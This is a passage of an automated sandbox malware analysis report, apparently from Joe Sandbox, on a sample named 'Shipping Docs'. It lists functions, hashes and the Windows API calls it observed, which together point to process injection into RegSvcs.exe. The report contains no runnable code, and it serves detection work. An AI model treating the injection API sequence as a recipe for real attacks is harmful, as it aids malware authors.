Function 07332610 Relevance: .1, Instructions: 139COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1231639994.0000000007330000.00000040.00000800.00020000.00000000.sdmp, Offset: 07330000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7330000_Shipping Docs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2b7ec6201e3153ca44c3f16dbd3e694bf373ca68aea1a801ed87e3e0618a923f
Instruction ID: f232665ff676149416ea85ece6fc787aba1247b1baa7cdc92857e842b42d0037
Opcode Fuzzy Hash: 2b7ec6201e3153ca44c3f16dbd3e694bf373ca68aea1a801ed87e3e0618a923f
Instruction Fuzzy Hash: 6251E3B4E19209CFEB14CF9AD8449EEBBFABF8A311F149026E419B7215D7709941CF50

Uniqueness

Uniqueness Score: -1.00%

Function 07333111 Relevance: .1, Instructions: 137COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1231639994.0000000007330000.00000040.00000800.00020000.00000000.sdmp, Offset: 07330000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7330000_Shipping Docs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fe9784d23ccdb98040c00b495cdae84f972dabf00fda48486768c7155c336a55
Instruction ID: 50ce7d0d1d2be25169c0c9544d690581f214d6846bb64f6dc76a55ebb99a8265
Opcode Fuzzy Hash: fe9784d23ccdb98040c00b495cdae84f972dabf00fda48486768c7155c336a55
Instruction Fuzzy Hash: 7F513DB0E042598FDB14DFA9C5409AEFBF2FF89304F14C16AD818AB216D7359941CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 073351A7 Relevance: .1, Instructions: 129COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1231639994.0000000007330000.00000040.00000800.00020000.00000000.sdmp, Offset: 07330000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7330000_Shipping Docs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 382bceefa11baf864c609aa9601cb66f2b19e5a926787e7133214c2d7abd2acb
Instruction ID: db25d46d4dc4465342c77e0bd4110a5b192983177b9b20ee01b14b975100bd01
Opcode Fuzzy Hash: 382bceefa11baf864c609aa9601cb66f2b19e5a926787e7133214c2d7abd2acb
Instruction Fuzzy Hash: B1511EB4E002598FDB14DFA9C5405AEFBF2BF89305F24C16AD818AB315D7319941CFA1

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: RegSvcs.exePID: 7268, Parent PID: 1664COMMON

Execution Graph

Execution Coverage:	10.9%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	0%
Total number of Nodes:	6
Total number of Limit Nodes:	0

Executed Functions

Function 02D57348 Relevance: 1.6, APIs: 1, Instructions: 61
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

DeleteFileW.KERNELBASE(00000000), ref: 02D573C0

Memory Dump Source

Source File: 00000009.00000002.1245325293.0000000002D50000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_2d50000_RegSvcs.jbxd

Similarity

API ID: DeleteFile
String ID:
API String ID: 4033686569-0
Opcode ID: e4085841388cd704ddce7deaacb289eb615b62cc450a9155d4a1beb5443063aa
Instruction ID: 8ac7b6ed196983f79f5d67467b716eb9926c42ab1c1ce38a473ea464ec8c51e0
Opcode Fuzzy Hash: e4085841388cd704ddce7deaacb289eb615b62cc450a9155d4a1beb5443063aa
Instruction Fuzzy Hash: 072134B1D0062A9FDB14CF9AC545B9EFBB4BB48320F10812AD858A7740D778A940CFA5

Uniqueness

Uniqueness Score: -1.00%

Function 02D57350 Relevance: 1.6, APIs: 1, Instructions: 56
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

DeleteFileW.KERNELBASE(00000000), ref: 02D573C0

Memory Dump Source

Source File: 00000009.00000002.1245325293.0000000002D50000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_2d50000_RegSvcs.jbxd

Similarity

API ID: DeleteFile
String ID:
API String ID: 4033686569-0
Opcode ID: b4af6b7c3a798fc4d2bbe47c46f21733011a83d0a118eb815e083a552c044c13
Instruction ID: 698ce9c38a1a5c124cd55dbb22ad6ae960ed6325c204bbfbd61869d7bb36b3b3
Opcode Fuzzy Hash: b4af6b7c3a798fc4d2bbe47c46f21733011a83d0a118eb815e083a552c044c13
Instruction Fuzzy Hash: 811124B1C006699BDB24CF9AC545B9EFBF4BB48220F10812AD868A7740D778A940CFA5

Uniqueness

Uniqueness Score: -1.00%

Function 0642E5D8 Relevance: 1.6, APIs: 1, Instructions: 54COMMON

Download Yara Rule

APIs

GlobalMemoryStatusEx.KERNELBASE ref: 0642E647

Memory Dump Source

Source File: 00000009.00000002.1249736257.0000000006420000.00000040.00000800.00020000.00000000.sdmp, Offset: 06420000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_6420000_RegSvcs.jbxd

Similarity

API ID: GlobalMemoryStatus
String ID:
API String ID: 1890195054-0
Opcode ID: 40beca4fc80545e008db3179828ada46fa22151e6378d7e5d80de3ec723d8959
Instruction ID: 669d1f2f4fafa3f22e736c3e6e258bdaf1c6f2236e363ebf6b0e584eb55ceed9
Opcode Fuzzy Hash: 40beca4fc80545e008db3179828ada46fa22151e6378d7e5d80de3ec723d8959
Instruction Fuzzy Hash: EF1114B5C0065A9FDB20CF9AC444BDEFBF4EF48210F14812AD918A7740D378A941CFA5

Uniqueness

Uniqueness Score: -1.00%

Function 0642E5E0 Relevance: 1.6, APIs: 1, Instructions: 52COMMON

Download Yara Rule

APIs

GlobalMemoryStatusEx.KERNELBASE ref: 0642E647

Memory Dump Source

Source File: 00000009.00000002.1249736257.0000000006420000.00000040.00000800.00020000.00000000.sdmp, Offset: 06420000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_6420000_RegSvcs.jbxd

Similarity

API ID: GlobalMemoryStatus
String ID:
API String ID: 1890195054-0
Opcode ID: ae019e7a4ce4344d9362687b83e319ebf3eeec234fbd612f2066eee0a696ae17
Instruction ID: bf67a9e5b32d4e96b3554ab6ddb1be5d591883a9d4fcbd3fa756fd08a67b27de
Opcode Fuzzy Hash: ae019e7a4ce4344d9362687b83e319ebf3eeec234fbd612f2066eee0a696ae17
Instruction Fuzzy Hash: 6711E4B1C0065A9FDB10CF9AC444BDEFBF4AB48210F15812AD918A7640D778A945CFA5

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: SVcPIbJno.exePID: 7428, Parent PID: 932COMMON

Execution Graph

Execution Coverage:	11.3%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	0%
Total number of Nodes:	262
Total number of Limit Nodes:	19

Executed Functions

Function 00E3D040 Relevance: 6.1, APIs: 4, Instructions: 128
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentProcess.KERNEL32 ref: 00E3D0BE
GetCurrentThread.KERNEL32 ref: 00E3D0FB
GetCurrentProcess.KERNEL32 ref: 00E3D138
GetCurrentThreadId.KERNEL32 ref: 00E3D191

Memory Dump Source

Source File: 0000000A.00000002.1266865870.0000000000E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_e30000_SVcPIbJno.jbxd

Similarity

API ID: Current$ProcessThread
String ID:
API String ID: 2063062207-0
Opcode ID: 70999db6d694f264648d30bedb0163e0fa4d795556b97a167e1b2f8f12174237
Instruction ID: cca87721756bde0e86d87c50b5bbea1ac569c9707edbd779b2fba51f2e410668
Opcode Fuzzy Hash: 70999db6d694f264648d30bedb0163e0fa4d795556b97a167e1b2f8f12174237
Instruction Fuzzy Hash: D75159B0901649CFEB14CFAAD9487DEBBF1EF88304F208419E419BB3A1D7745944CB65

Uniqueness

Uniqueness Score: -1.00%

Function 00E344B0 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 96
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateActCtxA.KERNEL32(?), ref: 00E359C9

Strings

Xm, xrefs: 00E35A41

Memory Dump Source

Source File: 0000000A.00000002.1266865870.0000000000E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_e30000_SVcPIbJno.jbxd

Similarity

API ID: Create
String ID: Xm
API String ID: 2289755597-1933489682
Opcode ID: 4154738fc87ec53a502dfadc32de0e2ca17ebc910d7a860a75d40c294f8d421a
Instruction ID: 38e42522b889f5c21d5682f9503ab61388a61ed34fcd5080698eb87162fe1229
Opcode Fuzzy Hash: 4154738fc87ec53a502dfadc32de0e2ca17ebc910d7a860a75d40c294f8d421a
Instruction Fuzzy Hash: 1A41EF71C00718CBEB24DFA9C885B8DBBB5BF89304F20806AD418AB251DB756946CF90

Uniqueness

Uniqueness Score: -1.00%

Function 00E3590D Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 94
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateActCtxA.KERNEL32(?), ref: 00E359C9

Strings

Xm, xrefs: 00E35A41

Memory Dump Source

Source File: 0000000A.00000002.1266865870.0000000000E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_e30000_SVcPIbJno.jbxd

Similarity

API ID: Create
String ID: Xm
API String ID: 2289755597-1933489682
Opcode ID: 1237b3906b4e818a37537a53e82726a666a01a9b42bb67a88b3211b7576e7edc
Instruction ID: 493ad73ee8438541776fa9d2ee386e8c960665b500529be84be9080015caca3f
Opcode Fuzzy Hash: 1237b3906b4e818a37537a53e82726a666a01a9b42bb67a88b3211b7576e7edc
Instruction Fuzzy Hash: 9341CFB1C00719CFEB24DFA9C88478DBBB5BF89304F20815AD418BB2A5DB755946CF50

Uniqueness

Uniqueness Score: -1.00%

Function 06DA5AE0 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 76
injectionCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 06DA5B78

Strings

}, xrefs: 06DA5B2C

Memory Dump Source

Source File: 0000000A.00000002.1285571498.0000000006DA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_6da0000_SVcPIbJno.jbxd

Similarity

API ID: MemoryProcessWrite
String ID: }
API String ID: 3559483778-4239843852
Opcode ID: 31dbc3243834db79c7ec3a7b14da1d3609e4e60ab5f8a6cfd12262ddbcbbe094
Instruction ID: 9849fe4adaff7a5aae156820caeebc5c03ceb2144339bd535bc4967ec742174b
Opcode Fuzzy Hash: 31dbc3243834db79c7ec3a7b14da1d3609e4e60ab5f8a6cfd12262ddbcbbe094
Instruction Fuzzy Hash: BC3145719003499FDB10CFAAC880BDEBBF1FF48310F10852AE968A7251C7799944CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 00E3A130 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 55
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,00E3B079,00000800,00000000,00000000), ref: 00E3B28A

Strings

D], xrefs: 00E3A130

Memory Dump Source

Source File: 0000000A.00000002.1266865870.0000000000E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_e30000_SVcPIbJno.jbxd

Similarity

API ID: LibraryLoad
String ID: D]
API String ID: 1029625771-637875248
Opcode ID: b0e0426ec149fdb22b916b0029829b8659ba19ad81750c730879b2aa204715c7
Instruction ID: 5e26602ae2e5e3fefc4c74064c8b82f466a8eb6a185cc21da7e7c8d0dbc0a567
Opcode Fuzzy Hash: b0e0426ec149fdb22b916b0029829b8659ba19ad81750c730879b2aa204715c7
Instruction Fuzzy Hash: A111D6B6D002499FDB10CF9AD448BDEFBF4EB48310F10852AD519BB650C379A545CFA5

Uniqueness

Uniqueness Score: -1.00%

Function 06DA5E6C Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 47
windowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

PostMessageW.USER32(?,00000010,00000000,?), ref: 06DA976D

Strings

ld, xrefs: 06DA5E6C

Memory Dump Source

Source File: 0000000A.00000002.1285571498.0000000006DA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_6da0000_SVcPIbJno.jbxd

Similarity

API ID: MessagePost
String ID: ld
API String ID: 410705778-1519904734
Opcode ID: f23a5deb861ad2f35c41c010f0f8960e9cbc6d9baccf467cbdd24f4bdccfc65b
Instruction ID: eda83391d3cafa7f0b5813927a0c29b35b89c1ced51acf82a81b66bad64f49f7
Opcode Fuzzy Hash: f23a5deb861ad2f35c41c010f0f8960e9cbc6d9baccf467cbdd24f4bdccfc65b
Instruction Fuzzy Hash: 8611F5B5C04348DFDB10DF9AC485BDEBBF8EB48310F108419E568A7251C375A944CFA5

Uniqueness

Uniqueness Score: -1.00%

Function 06D3F4A0 Relevance: 2.7, Strings: 2, Instructions: 178
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

Teq, xrefs: 06D3F5D3
Teq, xrefs: 06D3F644

Memory Dump Source

Source File: 0000000A.00000002.1285281247.0000000006D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_6d30000_SVcPIbJno.jbxd

Similarity

API ID:
String ID: Teq$Teq
API String ID: 0-2938103587
Opcode ID: 9c44b7f67ef317031932704f72689fe2056a3e51bc0af3997bd17b5a5230db6c
Instruction ID: 4f6154c8f450edccdf14ce12bf7c958bcc1edeb837ca435c80307c88735af03b
Opcode Fuzzy Hash: 9c44b7f67ef317031932704f72689fe2056a3e51bc0af3997bd17b5a5230db6c
Instruction Fuzzy Hash: B761C574E0521C8FDB48CFA9C9446EDBBB6FF89300F14902AE419AB365DB749905CF50

Uniqueness

Uniqueness Score: -1.00%

Function 06DA6165 Relevance: 1.7, APIs: 1, Instructions: 247
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 06DA63A6

Memory Dump Source

Source File: 0000000A.00000002.1285571498.0000000006DA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_6da0000_SVcPIbJno.jbxd

Similarity

API ID: CreateProcess
String ID:
API String ID: 963392458-0
Opcode ID: db3528c42f72058fca8ea4b119efa2f7fa9ba61951566a52b15b6bb4e6fbdfd6
Instruction ID: 1c91b8be433198d547369a3f2d467f312a7e615c21d13f5cbca7a145a29b216a
Opcode Fuzzy Hash: db3528c42f72058fca8ea4b119efa2f7fa9ba61951566a52b15b6bb4e6fbdfd6
Instruction Fuzzy Hash: 1CA16C71D04359CFEB64CFA8C841BDDBBB2BF49310F188569E858A7280DB749985CF91

Uniqueness

Uniqueness Score: -1.00%

Function 06DA6170 Relevance: 1.7, APIs: 1, Instructions: 243
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 06DA63A6

Memory Dump Source

Source File: 0000000A.00000002.1285571498.0000000006DA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_6da0000_SVcPIbJno.jbxd

Similarity

API ID: CreateProcess
String ID:
API String ID: 963392458-0
Opcode ID: d8a886e8d274cfc4d7a49a82bda2f71725e67d7f6a4fd87f4bc8f3c911e3e205
Instruction ID: c760e29799e9b4da4e1331b165c416f765ea6c88ede47dfa1768a2af2c3e9e1f
Opcode Fuzzy Hash: d8a886e8d274cfc4d7a49a82bda2f71725e67d7f6a4fd87f4bc8f3c911e3e205
Instruction Fuzzy Hash: 5C914B71D04359CFEB64CFA8C841BEDBBB2BF48310F188569E818A7280DB759985CF91

Uniqueness

Uniqueness Score: -1.00%

Function 00E3ADA8 Relevance: 1.7, APIs: 1, Instructions: 198
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleHandleW.KERNELBASE(00000000), ref: 00E3AFFE

Memory Dump Source

Source File: 0000000A.00000002.1266865870.0000000000E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_e30000_SVcPIbJno.jbxd

Similarity

API ID: HandleModule
String ID:
API String ID: 4139908857-0
Opcode ID: 82b9ac227c5c13d9f16f31d9a46bca4b671da80c7b26f8075d8378c61578876e
Instruction ID: 51ef4f4fc1245e157856a3d7da0a814b03094e4ebcc5c71866962d6c55aefd9a
Opcode Fuzzy Hash: 82b9ac227c5c13d9f16f31d9a46bca4b671da80c7b26f8075d8378c61578876e
Instruction Fuzzy Hash: E0714970A00B058FDB24DF2AD44575ABBF1FF88304F048A2ED496EBA50D775E989CB91

Uniqueness

Uniqueness Score: -1.00%

Function 00E3D751 Relevance: 1.6, APIs: 1, Instructions: 84COMMON

Download Yara Rule

APIs

DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 00E3D717

Memory Dump Source

Source File: 0000000A.00000002.1266865870.0000000000E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_e30000_SVcPIbJno.jbxd

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: 5b753d02ee4b71410be435ea4c8aa3e47d6938f82a30984bd9e39fab7219ab7e
Instruction ID: 1dc4f1217324a67aa1471e71ab2f09109f08c01e39f6eb604797699bff759ed1
Opcode Fuzzy Hash: 5b753d02ee4b71410be435ea4c8aa3e47d6938f82a30984bd9e39fab7219ab7e
Instruction Fuzzy Hash: AD3172746443809FE708AF61E84476D3BB1FB85712F508A2AE9619F7D8DEB84C4ACF50

Uniqueness

Uniqueness Score: -1.00%

Function 06DA5AE8 Relevance: 1.6, APIs: 1, Instructions: 69injectionCOMMON

Download Yara Rule

APIs

WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 06DA5B78

Memory Dump Source

Source File: 0000000A.00000002.1285571498.0000000006DA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_6da0000_SVcPIbJno.jbxd

Similarity

API ID: MemoryProcessWrite
String ID:
API String ID: 3559483778-0
Opcode ID: d36906694d0e397c09ff11a5a51168254286fc2432c32bbace34d9a1ed5a0806
Instruction ID: 0731837003b535cbf15f1464dcd76fb4a837b63e759f3c9363616f75d13540d2
Opcode Fuzzy Hash: d36906694d0e397c09ff11a5a51168254286fc2432c32bbace34d9a1ed5a0806
Instruction Fuzzy Hash: DC212272D003499FDB10CFAAC880BEEBBF5FF48310F10852AE919A7240C7799944CBA5

Uniqueness

Uniqueness Score: -1.00%

Function 06DA5BD0 Relevance: 1.6, APIs: 1, Instructions: 68COMMON

Download Yara Rule

APIs

ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 06DA5C58

Memory Dump Source

Source File: 0000000A.00000002.1285571498.0000000006DA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_6da0000_SVcPIbJno.jbxd

Similarity

API ID: MemoryProcessRead
String ID:
API String ID: 1726664587-0
Opcode ID: 5f8eff2bd19d2a3ea469c104b9d84d8f12ac607084a485ca59eb548e97bf8782
Instruction ID: ec2a426ada43722c97ee2263346d7a90e34db864ade527d1b22f4d64bd56ba36
Opcode Fuzzy Hash: 5f8eff2bd19d2a3ea469c104b9d84d8f12ac607084a485ca59eb548e97bf8782
Instruction Fuzzy Hash: BE21F6B18003499FDB10CFAAC984BDEBBF5FF48310F10842AE559A7240C7799945CB65

Uniqueness

Uniqueness Score: -1.00%

Function 06DA50D8 Relevance: 1.6, APIs: 1, Instructions: 68threadCOMMON

Download Yara Rule

APIs

Wow64SetThreadContext.KERNEL32(?,00000000), ref: 06DA515E

Memory Dump Source

Source File: 0000000A.00000002.1285571498.0000000006DA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_6da0000_SVcPIbJno.jbxd

Similarity

API ID: ContextThreadWow64
String ID:
API String ID: 983334009-0
Opcode ID: 30aab97350445e0347552ac293e30d1509bf72f8dd1a07e806dd2e06ac22cc8d
Instruction ID: 72663786c8fe497a9a6ec22877ec32c4f56cbde802fe6b3c3996e482a682c4d1
Opcode Fuzzy Hash: 30aab97350445e0347552ac293e30d1509bf72f8dd1a07e806dd2e06ac22cc8d
Instruction Fuzzy Hash: A62148B1D003098FDB50CFAAC8847EEBBF4EF48320F14842AD559A7240CB789945CFA5

Uniqueness

Uniqueness Score: -1.00%

Function 06DA5BD8 Relevance: 1.6, APIs: 1, Instructions: 63COMMON

Download Yara Rule

APIs

ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 06DA5C58

Memory Dump Source

Source File: 0000000A.00000002.1285571498.0000000006DA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_6da0000_SVcPIbJno.jbxd

Similarity

API ID: MemoryProcessRead
String ID:
API String ID: 1726664587-0
Opcode ID: 0e2b07dc066c41d6181d98dc95f0fb5d28e67846c7f27ea02bf6b28e0cfbc334
Instruction ID: 668eaf9d3ee4f72df64668430bbbdab615f3574632b28aa19c6dc3c3c04776fa
Opcode Fuzzy Hash: 0e2b07dc066c41d6181d98dc95f0fb5d28e67846c7f27ea02bf6b28e0cfbc334
Instruction Fuzzy Hash: C12125B1C003499FDB10CFAAC880BEEBBF5FF48310F10842AE919A7240C7799944CBA5

Uniqueness

Uniqueness Score: -1.00%

Function 06DA50E0 Relevance: 1.6, APIs: 1, Instructions: 63threadCOMMON

Download Yara Rule

APIs

Wow64SetThreadContext.KERNEL32(?,00000000), ref: 06DA515E

Memory Dump Source

Source File: 0000000A.00000002.1285571498.0000000006DA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_6da0000_SVcPIbJno.jbxd

Similarity

API ID: ContextThreadWow64
String ID:
API String ID: 983334009-0
Opcode ID: 61482b528efa1badf8d53f626b66554e6344ee0fdaa3df2fab42e49eee0b6160
Instruction ID: 12f2b3d69173f622fcc54667ce0dd540dfae24a634a5a4451e519aa1e61c039c
Opcode Fuzzy Hash: 61482b528efa1badf8d53f626b66554e6344ee0fdaa3df2fab42e49eee0b6160
Instruction Fuzzy Hash: 82213571D003098FDB14CFAAC884BEEBBF4EF48320F14842AD519A7240CB789945CFA5

Uniqueness

Uniqueness Score: -1.00%

Function 00E3D690 Relevance: 1.6, APIs: 1, Instructions: 62COMMON

Download Yara Rule

APIs

DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 00E3D717

Memory Dump Source

Source File: 0000000A.00000002.1266865870.0000000000E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_e30000_SVcPIbJno.jbxd

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: a4ace088b8c655d705d72adfc218515d357734f60bd449a574563e21f0aa792a
Instruction ID: 7b747157c6f208f19e5fa90867a8018f1bfe56f5fd63abff0c5ec37d43af1d9e
Opcode Fuzzy Hash: a4ace088b8c655d705d72adfc218515d357734f60bd449a574563e21f0aa792a
Instruction Fuzzy Hash: E521C4B5D00248DFDB10CF9AD984ADEBBF5FB48310F14841AE918A7350D379A954CFA5

Uniqueness

Uniqueness Score: -1.00%

Function 06DA5A20 Relevance: 1.6, APIs: 1, Instructions: 56memoryCOMMON

Download Yara Rule

APIs

VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 06DA5A96

Memory Dump Source

Source File: 0000000A.00000002.1285571498.0000000006DA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_6da0000_SVcPIbJno.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 8e747f0623b7b9167ad1953235a22eb495827ea48c4d66895ec52e1366d4f4ca
Instruction ID: d9f9cfc9c0f162fa4d7a20016bb9b2dbe0c9db8ad3fc1001f4f2d0693a6b39b8
Opcode Fuzzy Hash: 8e747f0623b7b9167ad1953235a22eb495827ea48c4d66895ec52e1366d4f4ca
Instruction Fuzzy Hash: D1215671900349DFDB20DFAAC844BDEBBF5EF49310F108819E555A7250CB7AA504CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 06DA5A28 Relevance: 1.6, APIs: 1, Instructions: 53memoryCOMMON

Download Yara Rule

APIs

VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 06DA5A96

Memory Dump Source

Source File: 0000000A.00000002.1285571498.0000000006DA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_6da0000_SVcPIbJno.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 9c8d608e281f0b3672fcfa205ddb211b3517f7a8b151149ce87922c24f1f32b5
Instruction ID: 39dcedbeb0d5f5d20d45c8c7184bba2698a035557c65c1dcf3391b2a506ea6f4
Opcode Fuzzy Hash: 9c8d608e281f0b3672fcfa205ddb211b3517f7a8b151149ce87922c24f1f32b5
Instruction Fuzzy Hash: 3B112672900349DFDB24DFAAC844BDEBBF5EF48310F148819E519A7250CB7AA544CFA5

Uniqueness

Uniqueness Score: -1.00%

Function 06DA5029 Relevance: 1.6, APIs: 1, Instructions: 51threadCOMMON

Download Yara Rule

APIs

ResumeThread.KERNELBASE ref: 06DA5092

Memory Dump Source

Source File: 0000000A.00000002.1285571498.0000000006DA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_6da0000_SVcPIbJno.jbxd

Similarity

API ID: ResumeThread
String ID:
API String ID: 947044025-0
Opcode ID: 9076d7f855c5a4d905cdc7540f9dcfc28f54a7e542a7ee176fe4e8e433f40019
Instruction ID: 88997c60f3cf82b9d2beb2cf8740764bcffa926e59369796ab12f4b06dc42bd9
Opcode Fuzzy Hash: 9076d7f855c5a4d905cdc7540f9dcfc28f54a7e542a7ee176fe4e8e433f40019
Instruction Fuzzy Hash: 70113471D043488FDB24DFAAC84479EBBF4EF48324F24881AD559AB240CB7A9945CB95

Uniqueness

Uniqueness Score: -1.00%

Function 06DA5030 Relevance: 1.5, APIs: 1, Instructions: 49threadCOMMON

Download Yara Rule

APIs

ResumeThread.KERNELBASE ref: 06DA5092

Memory Dump Source

Source File: 0000000A.00000002.1285571498.0000000006DA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_6da0000_SVcPIbJno.jbxd

Similarity

API ID: ResumeThread
String ID:
API String ID: 947044025-0
Opcode ID: 49d0f46fdbfe63770c6cbeac893ff61ee683d4caffb160c28aad56c272536fab
Instruction ID: 519c4c5427bfefdabca0c9b601c657a0587cda9404dcce9f83b50c6f914a5978
Opcode Fuzzy Hash: 49d0f46fdbfe63770c6cbeac893ff61ee683d4caffb160c28aad56c272536fab
Instruction Fuzzy Hash: 46112871D00348CFDB24DFAAC4447DEFBF5EF48214F148419D519A7240CB79A544CB95

Uniqueness

Uniqueness Score: -1.00%

Function 00E3AF98 Relevance: 1.5, APIs: 1, Instructions: 47COMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNELBASE(00000000), ref: 00E3AFFE

Memory Dump Source

Source File: 0000000A.00000002.1266865870.0000000000E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_e30000_SVcPIbJno.jbxd

Similarity

API ID: HandleModule
String ID:
API String ID: 4139908857-0
Opcode ID: 52f6a50be2fce9cd4d918ba478357683279aa6e020e0f417547d09f4d2898931
Instruction ID: 6df10bc18748aa0699623cbf93b87e075c180742fa17074d9b0060cb50ea41a4
Opcode Fuzzy Hash: 52f6a50be2fce9cd4d918ba478357683279aa6e020e0f417547d09f4d2898931
Instruction Fuzzy Hash: A4110FB6C00249CFDB24CF9AC444BDEFBF4EB88314F10842AD529A7210C379A545CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 06DA9709 Relevance: 1.5, APIs: 1, Instructions: 46windowCOMMON

Download Yara Rule

APIs

PostMessageW.USER32(?,00000010,00000000,?), ref: 06DA976D

Memory Dump Source

